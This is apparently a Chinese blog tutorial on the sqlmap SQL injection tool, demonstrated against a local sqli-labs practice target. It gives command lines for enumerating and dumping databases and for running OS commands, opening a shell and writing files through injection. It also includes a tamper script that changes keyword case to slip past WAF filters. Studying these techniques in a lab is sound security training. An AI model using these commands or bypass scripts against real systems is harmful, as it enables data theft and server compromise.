sqlmap从注入到脚本制作【超全】

于 2024-07-30 00:00:00 发布
阅读量669 收藏 16
点赞数 21
分类专栏: 网络空间安全 文章标签: 安全架构 网络安全 安全性测试 安全威胁分析 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140750855
版权

在这里插入图片描述

官方地址:Tags · sqlmapproject/sqlmap (github.com)

文章目录

简介

SQLMap 是一个开源的渗透测试工具,专门用于自动化检测和利用 SQL 注入漏洞。它具备强大的功能和灵活的使用方式,适合安全研究人员和渗透测试人员使用。

基本知识

  1. 脚本存放路径在sqlmap的当前路径的tamper文件夹中
  2. 结果或者日志存放在C:\Users\Administrator\AppData\Local\sqlmap\output
  3. 数据库爆破时的字典是在data\txt这个文件夹的

使用教程

  1. 普通注入

    1. 示例数据库结构:
      靶场:sqli-labs 第一关
[*] 123456
[*] challenges
[*] demo01
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
	| emails   |
		+----------+-------------+
		| Column   | Type        |
		+----------+-------------+
		| email_id | varchar(30) |
		| id       | int(3)      |
		+----------+-------------+
				+----+------------------------+
				| id | email_id               |
				+----+------------------------+
				| 1  | Dumb@dhakkan.com       |
				| 2  | Angel@iloveu.com       |
				| 3  | Dummy@dhakkan.local    |
				| 4  | secure@dhakkan.local   |
				| 5  | stupid@dhakkan.local   |
				| 6  | superman@dhakkan.local |
				| 7  | batman@dhakkan.local   |
				| 8  | admin@dhakkan.com      |
				+----+------------------------+
	| referers |
	| uagents  |
| users
[*] sys
    2. 爆破所有数据库名

      1. payload:

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --dbs
    3. 爆破表名

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" -D "security" --tables
    4. 爆破列名(字段)

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --columns -T "emails" -D "security"
    5. 爆破数据

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" -T "emails" -D "security" -C "id,email_id" --dump

  2. 无应答注入

    1. 在注入过程中通常会询问’yes’ or ‘no’,添加参数则设置为默认状态

    2. payload:

      python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --batch

  3. 数据包注入

    1. data字段数据提交

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-11/" --data "uname=adminn*&passwd=adad*&submit=Submit*"
    2. 整个数据包提交

      1. payload

        python sqlmap.py -r .\1.txt

  4. 注入水平与风险程度

    1. 注入水平

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-11/" --level=(1-5,默认为1)
    2. 风险程度

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-11/" --risk=(0-3,默认为1)

  5. 刷新缓存

    1. 自动刷新

      1. payload

        python sqlmap.py --purge
    2. 手动刷新

      1. 文件存放目录路径

        C:\Users\Administrator\AppData\Local\sqlmap\output

  6. 当前数据库名称

    1. payload

      python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --current-db

  7. 数据库用户权限

    1. 查看权限

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --privileges
    2. 判断是否管理员权限

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --is-dba

  8. 数据库用户

    1. 所有数据库用户

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --users
    2. 当前数据库用户

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --users

  9. 打乱默认指纹

    1. payload:

      --user-agent ""   //自定义user-agent
--random-agent   //随机user-agent
--time-sec=(2,5)   //延迟响应,默认为5

  10. 执行数据库命令

    1. 执行cmd命令

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --os-cmd=dir
    2. 系统交互命令

      1. payload

        python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --os-shell

  11. 读取文件

    1. payload

      python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --file-write "D:\phpstudy_pro\WWW\demo01\xiaodi.php" --file-dest "c:\test\1.txt"

  12. 设置代理

    1. payload

      python sqlmap.py -u "http://127.0.0.1/sqliab/Less-1/?id=1" --proxy "http://127.0.0.1:8080/"

  13. 脚本使用

    1. payload

      python sqlmap.py -u "http://127.0.0.1/demo01/sqli/base64.php?id=MQ==" --tamper=base64encode.py
脚本名称可在tamper文件夹找到

  14. 脚本制作

    1. 使用说明

      1. 我们可以看到模版那里有很多reolace函数,这些是字符串替换函数,例如replace(‘SELECT’,‘sElEct’)是将SELECT替换成sElEct,现在因该懂了吧,就是自己找到绕过的方法,通过替换来进行绕过,从而顺利执行sqlmap

    2. 模版

      #!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Base64-encodes all characters in a given payload

    >>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='
    """

    if payload:    
        payload = payload.replace('SELECT','sElEct')
        payload = payload.replace('OR','Or')
        payload = payload.replace('AND','And')
        payload = payload.replace('SLEEP','SleeP')
        payload = payload.replace('ELT','Elt')
    return payload

在这里插入图片描述

CongSec
关注
  • 21
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQLmap绕过waf的脚本详解
一杯咖啡的渗透记忆
11-15 1966
使用方法--tamper xxx.py apostrophemask.py 用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py 在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 bet...
sqlmap自动化脚本
03-27
自己用批处理写的一个sqlmap脚本,不用看手册输命令行了 大部分参数均可设置,也可以自己输入其他参数
定制sqlmap tamper脚本
arthur2612的博客
01-07 231
前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了。 测试测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接403了。 测试了其他的一些参数,发现过滤了大部分的注入命令,但是可以利用mysql的注释方法进行绕过,例如网站会拦截sleep()函数,可以利用/!50000sleep(5)/绕过拦截,接...
sqlmap脚本
03-08
sqlmap绕过安全脚本 源自github sqlmap绕过安全脚本 来源自github
SQLMAP脚本-sql-labs-Less-41-45
m0_69844818的博客
01-06 154
首先忘记说unmagicquotes.py的写法了,真变成为了使用脚本而使用脚本了...
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 425
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
sqlmap详细教程
简介
01-04 3226
SQLmqp教程!
2022年中职组网络空间安全C模块批量漏洞脚本脚本制作思路
05-19
网络安全领域,尤其是在中职阶段的学习中,"2022年中职组网络空间安全C模块批量漏洞脚本脚本制作思路"是一个重要的课题。这个主题涉及到如何利用编程技术自动化检测和修复网络系统中的安全漏洞,提高网络安全...
从数据库原理了解什么是sql注入
heibaikong6的博客
12-04 1002
文章目录数据库相关概念 数据库相关概念
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
sqlmap的一些脚本的使用,绕过滤的神器
11-26
sql注入神奇,搭配各种脚本,花式绕过滤,懂的人自然懂,哈哈,欢迎下载
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
mysql osshell_sqlmap os-shell探索
weixin_42529366的博客
02-07 538
1 条件网站的绝对路径mysql进程有网站绝对路径的写权限mysql用户为rootmysql允许写[secure_file_priv]GPC关闭2 过程dvwa-low-sqli为例sqlmap -u "http://ip/vulnerabilities/sqli/?id=111&Submit=Submit#" --cookie='PHPSESSID=t875bj3h4imdvhk7vce...
SQLMAP脚本-sql-labs-Less-30-34
m0_69844818的博客
01-04 456
和上一关一样先使用上一关的脚本跑一下发现跑不出来了,看一下后端代码按道理只是把单引号换成了双引号,sqlmap应该是会尝试双引号注入但我怎么跑都跑步出来,尝试在脚本里面手动替换双引号。
sqlmap之tamper脚本编写
越努力 越自由
07-26 8967
目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies():
sqlmap tamper脚本_Fuzz脚本的编写
weixin_39960319的博客
11-21 225
原创: Naivete 合天智汇目录1.mysqlsql注入2.环境搭建3.fuzz脚本编写4.嵌入到sqlmap的tamper脚本能力有限,仅以sql注入为例子(其中以某学长的提醒,某行嘉宾前辈的课程和讲解为基础,以网上前辈各大博客为拓展写出此文)5.总结1. mysql sql注入略。2. 环境搭建这里详细说下,坑有些,浪费时间性价比不高1某狗下载http://free....
SQLMap的Tamper脚本
最新发布
m0_62207482的博客
01-31 3253
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
帮我些一个sqlmap注入脚本python
05-18
以下是一个简单的 SQLMap 注入脚本示例,你可以根据自己的需要进行修改和扩展: ```python import os def sqlmap_injection(url): cmd = "sqlmap -u {} --batch --tamper=space2comment".format(url) os.system(cmd) if __name__ == '__main__': url = input("请输入待注入的URL:") sqlmap_injection(url) ``` 在运行脚本时,输入待注入的 URL,即可使用 SQLMap 对该 URL 进行注入漏洞检测。注入过程中,脚本会自动将空格转换为注释符号,以绕过一些简单的防护机制。但需要注意的是,该脚本仅供学习和测试使用,请勿用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值